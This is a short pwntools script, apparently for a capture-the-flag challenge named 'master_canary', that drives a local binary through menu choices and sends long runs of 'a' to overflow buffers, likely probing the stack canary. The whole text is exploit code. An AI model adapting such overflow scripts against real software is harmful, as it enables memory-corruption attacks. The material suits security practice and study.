from pwn import *
p = process("./master_canary")
pause()
elf = ELF("./master_canary")
p.sendline("1")
sleep(0.1)
p.sendline("2")
sleep(0.1)
p.sendline("3000")
sleep(0.1)
p.sendline("a" * 3000)
sleep(0.1)
p.sendline("3")
sleep(0.1)
p.sendline("a" * 1023)
p.interactive()
